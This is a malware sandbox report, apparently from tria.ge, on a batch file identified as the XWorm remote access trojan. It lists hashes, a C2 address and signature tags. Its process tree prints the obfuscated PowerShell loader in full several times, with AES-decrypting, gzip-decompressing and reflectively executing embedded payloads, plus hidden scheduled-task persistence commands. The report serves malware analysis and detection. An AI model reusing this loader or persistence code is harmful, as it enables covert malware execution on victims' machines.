Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    111s
  • max time network
    110s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    15/06/2024, 18:59

General

  • Target

    binded.bat

  • Size

    1.1MB

  • MD5

    4fcc4a79a40b5d4eda4116d6296dc607

  • SHA1

    4f140172d00f5a40eb9c0f07b166cfc2111f0d71

  • SHA256

    888b6ce9498a1425df0701fdc73c99c255684ec192db6290e16bb4c82da8656e

  • SHA512

    2614afb3e2f7f5501246d79c7871710d0048ebacc69e517766709fdcb56e858c27deb4ed0fe1eab46f8175033446fb2f720fb43ff161552986d31dd4a8e0ccc1

  • SSDEEP

    24576:vVq7sFq6XgPKd2wM6RcN9vz4vO21SCKesDu8a1KZ/4hvXQ:vxlR6QBsxb/4C

Malware Config

Extracted

Family

xworm

Version

5.0

C2

37.114.46.114:5555

Mutex

ybJkzY88U2SuCjEV

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
    1⤵
      PID:732
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch
      1⤵
        PID:816
        • C:\Windows\system32\DllHost.exe
          C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          2⤵
            PID:4236
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\svchost.bat" "
              3⤵
                PID:1844
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0r+0kyFBt0CB4/hGdDqpXDDHp0ZFdJ2yISJo1fJ42Xw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2eU97tnvMxgKqltgo/SJg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $keVus=New-Object System.IO.MemoryStream(,$param_var); $mUyJN=New-Object System.IO.MemoryStream; $kYZlL=New-Object System.IO.Compression.GZipStream($keVus, [IO.Compression.CompressionMode]::Decompress); $kYZlL.CopyTo($mUyJN); $kYZlL.Dispose(); $keVus.Dispose(); $mUyJN.Dispose(); $mUyJN.ToArray();}function execute_function($param_var,$param2_var){ $uJZpt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mEYQo=$uJZpt.EntryPoint; $mEYQo.Invoke($null, $param2_var);}$HNCvy = 'C:\Users\Admin\AppData\Local\svchost.bat';$host.UI.RawUI.WindowTitle = $HNCvy;$rjaMb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HNCvy).Split([Environment]::NewLine);foreach ($ddjCn in $rjaMb) { if ($ddjCn.StartsWith('EyTFRVkAWjarRNfpfcEu')) { $trlof=$ddjCn.Substring(20); break; }}$payloads_var=[string[]]$trlof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                  4⤵
                    PID:196
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2688
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$rundll_724_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$svchost_724.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                      5⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3744
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$svchost_724.vbs"
                      5⤵
                        PID:2372
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$svchost_724.bat" "
                          6⤵
                            PID:5032
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0r+0kyFBt0CB4/hGdDqpXDDHp0ZFdJ2yISJo1fJ42Xw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2eU97tnvMxgKqltgo/SJg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $keVus=New-Object System.IO.MemoryStream(,$param_var); $mUyJN=New-Object System.IO.MemoryStream; $kYZlL=New-Object System.IO.Compression.GZipStream($keVus, [IO.Compression.CompressionMode]::Decompress); $kYZlL.CopyTo($mUyJN); $kYZlL.Dispose(); $keVus.Dispose(); $mUyJN.Dispose(); $mUyJN.ToArray();}function execute_function($param_var,$param2_var){ $uJZpt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mEYQo=$uJZpt.EntryPoint; $mEYQo.Invoke($null, $param2_var);}$HNCvy = 'C:\Users\Admin\AppData\Roaming\$svchost_724.bat';$host.UI.RawUI.WindowTitle = $HNCvy;$rjaMb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HNCvy).Split([Environment]::NewLine);foreach ($ddjCn in $rjaMb) { if ($ddjCn.StartsWith('EyTFRVkAWjarRNfpfcEu')) { $trlof=$ddjCn.Substring(20); break; }}$payloads_var=[string[]]$trlof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                              7⤵
                                PID:4128
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:3028
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k rpcss
                    1⤵
                      PID:868
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
                      1⤵
                        PID:916
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:408
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
                          1⤵
                            PID:492
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                            1⤵
                              PID:936
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                              1⤵
                                PID:1080
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                                1⤵
                                  PID:1092
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                  1⤵
                                  • Drops file in System32 directory
                                  PID:1100
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k localservice -s nsi
                                  1⤵
                                    PID:1208
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                    1⤵
                                      PID:1216
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                      1⤵
                                        PID:1352
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                        1⤵
                                          PID:1360
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                          1⤵
                                            PID:1368
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                            1⤵
                                              PID:1408
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                              1⤵
                                                PID:1508
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                                1⤵
                                                  PID:1560
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                                  1⤵
                                                    PID:1588
                                                  • c:\windows\system32\svchost.exe
                                                    c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                                    1⤵
                                                      PID:1620
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                      1⤵
                                                        PID:1684
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                        1⤵
                                                          PID:1752
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                          1⤵
                                                            PID:1776
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                            1⤵
                                                              PID:1784
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                              1⤵
                                                                PID:1852
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                1⤵
                                                                  PID:1904
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                                  1⤵
                                                                    PID:1876
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                    1⤵
                                                                      PID:2184
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                      1⤵
                                                                        PID:2252
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                        1⤵
                                                                          PID:2504
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                          1⤵
                                                                            PID:2512
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                            1⤵
                                                                              PID:2520
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2704
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                1⤵
                                                                                  PID:2732
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                                  1⤵
                                                                                    PID:2748
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                                    1⤵
                                                                                      PID:2808
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                      1⤵
                                                                                        PID:2832
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                        1⤵
                                                                                          PID:3204
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          C:\Windows\Explorer.EXE
                                                                                          1⤵
                                                                                            PID:3384
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\binded.bat"
                                                                                              2⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1468
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ubDdfc++dGnZOierWx4nOy1eVZcVDN85yhJABtnz1EQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gCMQkn589+ljXLannfa+nQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RIlPD=New-Object System.IO.MemoryStream(,$param_var); $OGgVf=New-Object System.IO.MemoryStream; $eubOA=New-Object System.IO.Compression.GZipStream($RIlPD, [IO.Compression.CompressionMode]::Decompress); $eubOA.CopyTo($OGgVf); $eubOA.Dispose(); $RIlPD.Dispose(); $OGgVf.Dispose(); $OGgVf.ToArray();}function execute_function($param_var,$param2_var){ $QwKrI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WoDJg=$QwKrI.EntryPoint; $WoDJg.Invoke($null, $param2_var);}$JMcWp = 'C:\Users\Admin\AppData\Local\Temp\binded.bat';$host.UI.RawUI.WindowTitle = $JMcWp;$AmLgz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JMcWp).Split([Environment]::NewLine);foreach ($SNfpD in $AmLgz) { if ($SNfpD.StartsWith('pMkqFCQhZNmuDPfTbxXO')) { $BtghH=$SNfpD.Substring(20); break; }}$payloads_var=[string[]]$BtghH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                3⤵
                                                                                                  PID:4640
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                  3⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4920
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\AppData\Local\dllhost.bat
                                                                                                    4⤵
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:5060
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\dllhost.bat""
                                                                                                      5⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:3236
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z2xC2h+C2t+xhefZVNgrwhVd+6cW81hKA09gr+Vgl4k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJXvi7Nv9XV1R1jEsJpl9g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYNnG=New-Object System.IO.MemoryStream(,$param_var); $ddxMX=New-Object System.IO.MemoryStream; $tCHGY=New-Object System.IO.Compression.GZipStream($FYNnG, [IO.Compression.CompressionMode]::Decompress); $tCHGY.CopyTo($ddxMX); $tCHGY.Dispose(); $FYNnG.Dispose(); $ddxMX.Dispose(); $ddxMX.ToArray();}function execute_function($param_var,$param2_var){ $FpgFt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IsQVI=$FpgFt.EntryPoint; $IsQVI.Invoke($null, $param2_var);}$gzWXE = 'C:\Users\Admin\AppData\Local\dllhost.bat';$host.UI.RawUI.WindowTitle = $gzWXE;$jVKyS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gzWXE).Split([Environment]::NewLine);foreach ($MYFti in $jVKyS) { if ($MYFti.StartsWith('mDQBKkDMpSmzSJjqvWce')) { $zEoKi=$MYFti.Substring(20); break; }}$payloads_var=[string[]]$zEoKi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                        6⤵
                                                                                                          PID:3128
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                          6⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:5068
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                                1⤵
                                                                                                  PID:4712
                                                                                                • c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                                  1⤵
                                                                                                    PID:4868
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:3588
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                    1⤵
                                                                                                      PID:4180
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\conhost.bat" "
                                                                                                      1⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:168
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtgTNLQD917Z3OfAalN5p6ncKCNzsah2L8s5ejdS+dc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jnVmcutmPup+V829XIUyUQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EAIzG=New-Object System.IO.MemoryStream(,$param_var); $allpB=New-Object System.IO.MemoryStream; $qQadD=New-Object System.IO.Compression.GZipStream($EAIzG, [IO.Compression.CompressionMode]::Decompress); $qQadD.CopyTo($allpB); $qQadD.Dispose(); $EAIzG.Dispose(); $allpB.Dispose(); $allpB.ToArray();}function execute_function($param_var,$param2_var){ $EsoDJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XgHWj=$EsoDJ.EntryPoint; $XgHWj.Invoke($null, $param2_var);}$MwOvg = 'C:\Users\Admin\AppData\Local\conhost.bat';$host.UI.RawUI.WindowTitle = $MwOvg;$kBJQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MwOvg).Split([Environment]::NewLine);foreach ($QatGk in $kBJQu) { if ($QatGk.StartsWith('vwDuqbmIlgDgjzMkEVvn')) { $STSYE=$QatGk.Substring(20); break; }}$payloads_var=[string[]]$STSYE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                        2⤵
                                                                                                          PID:3840
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                          2⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:5048
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_861_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                            3⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:3832
                                                                                                          • C:\Windows\System32\WScript.exe
                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.vbs"
                                                                                                            3⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:4928
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.bat" "
                                                                                                              4⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:756
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtgTNLQD917Z3OfAalN5p6ncKCNzsah2L8s5ejdS+dc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jnVmcutmPup+V829XIUyUQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EAIzG=New-Object System.IO.MemoryStream(,$param_var); $allpB=New-Object System.IO.MemoryStream; $qQadD=New-Object System.IO.Compression.GZipStream($EAIzG, [IO.Compression.CompressionMode]::Decompress); $qQadD.CopyTo($allpB); $qQadD.Dispose(); $EAIzG.Dispose(); $allpB.Dispose(); $allpB.ToArray();}function execute_function($param_var,$param2_var){ $EsoDJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XgHWj=$EsoDJ.EntryPoint; $XgHWj.Invoke($null, $param2_var);}$MwOvg = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.bat';$host.UI.RawUI.WindowTitle = $MwOvg;$kBJQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MwOvg).Split([Environment]::NewLine);foreach ($QatGk in $kBJQu) { if ($QatGk.StartsWith('vwDuqbmIlgDgjzMkEVvn')) { $STSYE=$QatGk.Substring(20); break; }}$payloads_var=[string[]]$STSYE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                                5⤵
                                                                                                                  PID:4964
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                                  5⤵
                                                                                                                  • Blocklisted process makes network request
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:3560
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
                                                                                                          1⤵
                                                                                                            PID:2556

                                                                                                          Network

                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                            Filesize

                                                                                                            3KB

                                                                                                            MD5

                                                                                                            4c10a330054b4aa9a37f63a4053f87d8

                                                                                                            SHA1

                                                                                                            49617e69ea31bb85d2ee6f9fc142a11c6e416f4a

                                                                                                            SHA256

                                                                                                            39b674c0a2727ac505dc12e1e9236b3646fe246efef25b1ae1036fd674246286

                                                                                                            SHA512

                                                                                                            f9f4e16c1eb2d2ca2e6330f0e11770e491f829958e1ebdd4a6f8ddc748c7b07b167680a9c07499b9eda088bf69d99a48e20fac98f36bc5b4cda8195747e3df1b

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                            Filesize

                                                                                                            50KB

                                                                                                            MD5

                                                                                                            2143b379fed61ab5450bab1a751798ce

                                                                                                            SHA1

                                                                                                            32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

                                                                                                            SHA256

                                                                                                            a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

                                                                                                            SHA512

                                                                                                            0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            690b700dfc96df64fefaa604eb5e9164

                                                                                                            SHA1

                                                                                                            2e4cce0a2781d5903e2bac1c912425a9dad2195d

